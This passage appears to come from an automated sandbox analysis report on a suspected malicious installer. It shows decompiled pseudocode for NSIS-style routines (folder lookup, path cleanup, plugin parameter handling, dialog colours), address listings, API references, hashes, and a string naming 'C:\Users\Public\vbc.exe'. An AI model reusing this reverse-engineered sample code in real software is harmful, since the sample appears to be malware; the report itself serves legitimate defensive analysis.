					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
					_v24 = _t80;
					_v28 = _t80 | 0x00000080;
					_v16 = _t41;
					_v20 = _t41 | 0x00000080;
					_t66 = _a8 + 2;
					__eflags = _t88 - 2;
					if(_t88 != 2) {
						__eflags = _t88 - 3;
						if(_t88 != 3) {
							__eflags = _t88 - 1;
							if(_t88 == 1) {
								__eflags = (_t41 | 0xffffffff) - _t97;
								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
							}
							L42:
							_t90 =  &(_t90[lstrlenA(_t90)]);
							_t39 = 0x42e3e0;
							continue;
						}
						__eflags = _t97 - 0x1d;
						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x430000;
							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
						} else {
							E004061AB(_t90,  *0x42f448);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406528(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42f44c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x42f4e4;
						if( *0x42f4e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x42f444;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062E0(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E0040624D(_a4, _t39);
			}



























                                                                                                                                                                                                          0x004062e0
                                                                                                                                                                                                          0x004062e0
                                                                                                                                                                                                          0x004062e0
                                                                                                                                                                                                          0x004062e6
                                                                                                                                                                                                          0x004062eb
                                                                                                                                                                                                          0x004062ed
                                                                                                                                                                                                          0x004062fc
                                                                                                                                                                                                          0x004062fc
                                                                                                                                                                                                          0x00406304
                                                                                                                                                                                                          0x00406305
                                                                                                                                                                                                          0x00406306
                                                                                                                                                                                                          0x00406307
                                                                                                                                                                                                          0x0040630a
                                                                                                                                                                                                          0x00406312
                                                                                                                                                                                                          0x00406314
                                                                                                                                                                                                          0x0040632b
                                                                                                                                                                                                          0x0040632e
                                                                                                                                                                                                          0x0040632e
                                                                                                                                                                                                          0x00406505
                                                                                                                                                                                                          0x00406505
                                                                                                                                                                                                          0x00406509
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040633b
                                                                                                                                                                                                          0x00406341
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406347
                                                                                                                                                                                                          0x00406348
                                                                                                                                                                                                          0x0040634b
                                                                                                                                                                                                          0x0040634e
                                                                                                                                                                                                          0x004064f8
                                                                                                                                                                                                          0x00406502
                                                                                                                                                                                                          0x00406504
                                                                                                                                                                                                          0x00406504
                                                                                                                                                                                                          0x004064fa
                                                                                                                                                                                                          0x004064fc
                                                                                                                                                                                                          0x004064fe
                                                                                                                                                                                                          0x004064ff
                                                                                                                                                                                                          0x004064ff
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004064f8
                                                                                                                                                                                                          0x00406354
                                                                                                                                                                                                          0x00406358
                                                                                                                                                                                                          0x00406368
                                                                                                                                                                                                          0x0040636f
                                                                                                                                                                                                          0x00406372
                                                                                                                                                                                                          0x0040637a
                                                                                                                                                                                                          0x0040637d
                                                                                                                                                                                                          0x00406384
                                                                                                                                                                                                          0x00406385
                                                                                                                                                                                                          0x00406388
                                                                                                                                                                                                          0x004064a5
                                                                                                                                                                                                          0x004064a8
                                                                                                                                                                                                          0x004064d8
                                                                                                                                                                                                          0x004064db
                                                                                                                                                                                                          0x004064e0
                                                                                                                                                                                                          0x004064e4
                                                                                                                                                                                                          0x004064e4
                                                                                                                                                                                                          0x004064e9
                                                                                                                                                                                                          0x004064ef
                                                                                                                                                                                                          0x004064f1
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004064f1
                                                                                                                                                                                                          0x004064aa
                                                                                                                                                                                                          0x004064ad
                                                                                                                                                                                                          0x004064c2
                                                                                                                                                                                                          0x004064c9
                                                                                                                                                                                                          0x004064af
                                                                                                                                                                                                          0x004064b6
                                                                                                                                                                                                          0x004064b6
                                                                                                                                                                                                          0x004064d1
                                                                                                                                                                                                          0x004064d4
                                                                                                                                                                                                          0x0040649d
                                                                                                                                                                                                          0x0040649e
                                                                                                                                                                                                          0x0040649e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004064d4
                                                                                                                                                                                                          0x0040638e
                                                                                                                                                                                                          0x00406395
                                                                                                                                                                                                          0x00406397
                                                                                                                                                                                                          0x00406398
                                                                                                                                                                                                          0x004063b2
                                                                                                                                                                                                          0x004063b2
                                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                                          0x004063b9
                                                                                                                                                                                                          0x004063c0
                                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                                          0x004063c4
                                                                                                                                                                                                          0x004063c5
                                                                                                                                                                                                          0x004063c7
                                                                                                                                                                                                          0x00406400
                                                                                                                                                                                                          0x00406403
                                                                                                                                                                                                          0x00406413
                                                                                                                                                                                                          0x00406416
                                                                                                                                                                                                          0x0040641e
                                                                                                                                                                                                          0x00406424
                                                                                                                                                                                                          0x00406424
                                                                                                                                                                                                          0x00406483
                                                                                                                                                                                                          0x00406483
                                                                                                                                                                                                          0x00406485
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406428
                                                                                                                                                                                                          0x0040642f
                                                                                                                                                                                                          0x00406430
                                                                                                                                                                                                          0x00406432
                                                                                                                                                                                                          0x0040644c
                                                                                                                                                                                                          0x0040645a
                                                                                                                                                                                                          0x00406460
                                                                                                                                                                                                          0x00406462
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406480
                                                                                                                                                                                                          0x00406468
                                                                                                                                                                                                          0x00406471
                                                                                                                                                                                                          0x00406474
                                                                                                                                                                                                          0x0040647a
                                                                                                                                                                                                          0x0040647e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040647e
                                                                                                                                                                                                          0x00406434
                                                                                                                                                                                                          0x00406437
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406446
                                                                                                                                                                                                          0x00406448
                                                                                                                                                                                                          0x0040644a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040644a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406483
                                                                                                                                                                                                          0x0040640b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004063c9
                                                                                                                                                                                                          0x004063e4
                                                                                                                                                                                                          0x004063e9
                                                                                                                                                                                                          0x004063ec
                                                                                                                                                                                                          0x0040648c
                                                                                                                                                                                                          0x0040648c
                                                                                                                                                                                                          0x00406490
                                                                                                                                                                                                          0x00406498
                                                                                                                                                                                                          0x00406498
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00406490
                                                                                                                                                                                                          0x004063f6
                                                                                                                                                                                                          0x00406487
                                                                                                                                                                                                          0x00406487
                                                                                                                                                                                                          0x0040648a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040648a
                                                                                                                                                                                                          0x004063c7
                                                                                                                                                                                                          0x0040639a
                                                                                                                                                                                                          0x0040639e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004063a0
                                                                                                                                                                                                          0x004063a4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004063a6
                                                                                                                                                                                                          0x004063aa
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004063ac
                                                                                                                                                                                                          0x004063ac
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004063ac
                                                                                                                                                                                                          0x004063aa
                                                                                                                                                                                                          0x0040650f
                                                                                                                                                                                                          0x00406519
                                                                                                                                                                                                          0x00406525
                                                                                                                                                                                                          0x00406525
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040640B
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?), ref: 0040645A
                                                                                                                                                                                                          • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                                                                                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                          • API String ID: 717251189-1230650788
                                                                                                                                                                                                          • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                                                                                                                                          • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 72E322F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                          			E72E322F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E72E312AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E72E3123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M72E3247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E72E312FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E72E312FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E72E31224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x72e3405c =  *0x72e3405c +  *0x72e3405c;
									__edi = GlobalAlloc(0x40,  *0x72e3405c +  *0x72e3405c);
									 *0x72e3405c = MultiByteToWideChar(0, 0, __ebx,  *0x72e3405c, __edi,  *0x72e3405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E72E312FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x72e3405c;
									__esi = __esi +  *0x72e34064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E72E31429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E72E31224(0x72e34034);
					goto L10;
				}
			}












                                                                                                                                                                                                          0x72e32306
                                                                                                                                                                                                          0x72e3230a
                                                                                                                                                                                                          0x72e32315
                                                                                                                                                                                                          0x72e32315
                                                                                                                                                                                                          0x72e3231c
                                                                                                                                                                                                          0x72e32321
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32325
                                                                                                                                                                                                          0x72e32328
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3232d
                                                                                                                                                                                                          0x72e32338
                                                                                                                                                                                                          0x72e32348
                                                                                                                                                                                                          0x72e3233f
                                                                                                                                                                                                          0x72e32341
                                                                                                                                                                                                          0x72e32357
                                                                                                                                                                                                          0x72e32357
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3232f
                                                                                                                                                                                                          0x72e3232f
                                                                                                                                                                                                          0x72e32358
                                                                                                                                                                                                          0x72e3235c
                                                                                                                                                                                                          0x72e3235e
                                                                                                                                                                                                          0x72e3235e
                                                                                                                                                                                                          0x72e32361
                                                                                                                                                                                                          0x72e32361
                                                                                                                                                                                                          0x72e32369
                                                                                                                                                                                                          0x72e3236c
                                                                                                                                                                                                          0x72e32373
                                                                                                                                                                                                          0x72e32377
                                                                                                                                                                                                          0x72e32446
                                                                                                                                                                                                          0x72e32447
                                                                                                                                                                                                          0x72e32452
                                                                                                                                                                                                          0x72e3247d
                                                                                                                                                                                                          0x72e3247d
                                                                                                                                                                                                          0x72e32462
                                                                                                                                                                                                          0x72e3246e
                                                                                                                                                                                                          0x72e32464
                                                                                                                                                                                                          0x72e32464
                                                                                                                                                                                                          0x72e32464
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3237d
                                                                                                                                                                                                          0x72e3237d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32384
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3238d
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3239b
                                                                                                                                                                                                          0x72e3239e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e323a7
                                                                                                                                                                                                          0x72e323ac
                                                                                                                                                                                                          0x72e323af
                                                                                                                                                                                                          0x72e323b0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e323bd
                                                                                                                                                                                                          0x72e323c8
                                                                                                                                                                                                          0x72e323d7
                                                                                                                                                                                                          0x72e323e2
                                                                                                                                                                                                          0x72e32405
                                                                                                                                                                                                          0x72e32408
                                                                                                                                                                                                          0x72e323e4
                                                                                                                                                                                                          0x72e323e8
                                                                                                                                                                                                          0x72e323ee
                                                                                                                                                                                                          0x72e323ef
                                                                                                                                                                                                          0x72e323f2
                                                                                                                                                                                                          0x72e323f3
                                                                                                                                                                                                          0x72e323f6
                                                                                                                                                                                                          0x72e323fd
                                                                                                                                                                                                          0x72e323fd
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32410
                                                                                                                                                                                                          0x72e32413
                                                                                                                                                                                                          0x72e3241f
                                                                                                                                                                                                          0x72e32421
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32424
                                                                                                                                                                                                          0x72e32427
                                                                                                                                                                                                          0x72e32428
                                                                                                                                                                                                          0x72e3242f
                                                                                                                                                                                                          0x72e32436
                                                                                                                                                                                                          0x72e32439
                                                                                                                                                                                                          0x72e3243b
                                                                                                                                                                                                          0x72e3243e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e3237d
                                                                                                                                                                                                          0x72e32377
                                                                                                                                                                                                          0x72e3234d
                                                                                                                                                                                                          0x72e32352
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x72e32352

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E32447
                                                                                                                                                                                                            • Part of subcall function 72E31224: lstrcpynA.KERNEL32(00000000,?,72E312CF,-72E3404B,72E311AB,-000000A0), ref: 72E31234
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 72E323C2
                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 72E323D7
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 72E323E8
                                                                                                                                                                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 72E323F6
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 72E323FD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2167878164.0000000072E31000.00000020.00020000.sdmp, Offset: 72E30000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167873253.0000000072E30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167884351.0000000072E33000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2167889901.0000000072E35000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                                                          • String ID: yFv
                                                                                                                                                                                                          • API String ID: 3730416702-2696520353
                                                                                                                                                                                                          • Opcode ID: 6ed4fa0f0c30c7b53ad78e8b0043dcb3c9171a2687b7b9660ccfab6c309ae07b
                                                                                                                                                                                                          • Instruction ID: 35e5229f678295ccb967e15e287267f3045b3f5dcf5ada8945bb8ba7f421ed49
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ed4fa0f0c30c7b53ad78e8b0043dcb3c9171a2687b7b9660ccfab6c309ae07b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E417B71908305DFD3128F299844B2AB7F9FB40327F90C95EF586CA142D7309955CFA2
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                                                                                                          0x0040652a
                                                                                                                                                                                                          0x00406532
                                                                                                                                                                                                          0x00406546
                                                                                                                                                                                                          0x00406546
                                                                                                                                                                                                          0x0040654c
                                                                                                                                                                                                          0x00406559
                                                                                                                                                                                                          0x00406559
                                                                                                                                                                                                          0x0040655a
                                                                                                                                                                                                          0x0040655c
                                                                                                                                                                                                          0x00406560
                                                                                                                                                                                                          0x00406562
                                                                                                                                                                                                          0x0040656b
                                                                                                                                                                                                          0x0040656d
                                                                                                                                                                                                          0x00406587
                                                                                                                                                                                                          0x0040658f
                                                                                                                                                                                                          0x0040658f
                                                                                                                                                                                                          0x00406594
                                                                                                                                                                                                          0x00406596
                                                                                                                                                                                                          0x00406598
                                                                                                                                                                                                          0x0040659c
                                                                                                                                                                                                          0x0040659d
                                                                                                                                                                                                          0x004065a0
                                                                                                                                                                                                          0x004065a8
                                                                                                                                                                                                          0x004065aa
                                                                                                                                                                                                          0x004065ae
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004065b4
                                                                                                                                                                                                          0x004065b9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004065b9
                                                                                                                                                                                                          0x004065be

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.2165562026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165547451.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165572222.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165607422.000000000041D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165615181.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165621749.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000004.00000002.2165630933.0000000000438000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                          • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 589700163-1374994687
                                                                                                                                                                                                          • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                                                                                                          • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                                                                                                                                          0x0040434a
                                                                                                                                                                                                          0x00404400
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404400
                                                                                                                                                                                                          0x0040435b
                                                                                                                                                                                                          0x0040435f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404379
                                                                                                                                                                                                          0x00404379
                                                                                                                                                                                                          0x00404382
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00404384
                                                                                                                                                                                                          0x00404390
                                                                                                                                                                                                          0x00404393
                                                                                                                                                                                                          0x00404393
                                                                                                                                                                                                          0x00404399
                                                                                                                                                                                                          0x0040439f
                                                                                                                                                                                                          0x0040439f
                                                                                                                                                                                                          0x004043ab
                                                                                                                                                                                                          0x004043b1
                                                                                                                                                                                                          0x004043b8
                                                                                                                                                                                                          0x004043bb
                                                                                                                                                                                                          0x004043be
                                                                                                                                                                                                          0x004043c0
